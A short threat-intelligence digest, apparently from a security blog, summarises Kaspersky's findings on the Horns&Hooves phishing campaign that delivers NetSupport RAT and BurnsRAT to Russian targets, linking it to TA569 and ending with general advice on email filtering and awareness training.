December 3, 2024 at 12:51AM
A new malware campaign named Horns&Hooves targets users and businesses in Russia, infecting over 1,000 victims since March 2023. It delivers NetSupport RAT and BurnsRAT, utilizing deceptive email attachments to install additional malware. The threat is linked to group TA569, known for facilitating ransomware attacks and data theft.
### Meeting Takeaways – Malware / Phishing Attack – December 3, 2024
**Campaign Overview:**
– A new malware campaign, named **Horns&Hooves** by Kaspersky, has primarily targeted individuals and businesses in **Russia** since **March 2023**, impacting over **1,000 victims**.
– The campaign’s objective is to deploy tools such as **NetSupport RAT** and **BurnsRAT**, facilitating the installation of additional stealer malware like **Rhadamanthys** and **Meduza**.
**Attack Vectors and Strategies:**
– Attackers have used **lookalike email attachments** in ZIP archives that contain **JScript scripts**, often disguised as legitimate business communications.
– The campaign shows an evolving **JavaScript payload**, with frequent updates and changes aimed at improving the success rate of the phishing attempts.
– ZIP files sometimes include documents related to the targeted organization to further deceive recipients into executing the malicious files.
**Technical details:**
– An early campaign sample utilized an **HTML Application (HTA)** file that, upon execution, downloads a fake PNG image and operates scripts via Windows’ **curl** and **BITSAdmin** tools to install NetSupport RAT.
– A mid-May 2023 iteration used JavaScript that mimicked legitimate libraries to activate infection sequences.
– The malware enables remote interactions over a network, including file transfer, command execution, and desktop management through the **Remote Manipulator System (RMS)**.
**Modus Operandi Evolution:**
– Later stages of the attack showcased a restructured **BAT file** for installing the RAT, incorporating the malware directly in JavaScript code, indicating an adaptive strategy by the threat actors.
– The campaign is linked to **TA569**, a known threat group associated with prior malware such as **SocGholish (FakeUpdates)** and recognized for facilitating ransomware attacks like **WastedLocker**.
**Potential Impacts:**
– Victim organizations face various risks including **data theft**, **encryption of data**, and overall **system damage**, especially if the access is sold or leveraged by other threat actors.
**Next Steps:**
– Companies should enhance their email and cybersecurity awareness training, focusing on identifying and managing phishing attacks effectively.
– Implementing more robust email filtering systems and malware detection tools could help mitigate risks associated with such campaigns.
For further insights, follow the company’s updates on **Twitter** and **LinkedIn**.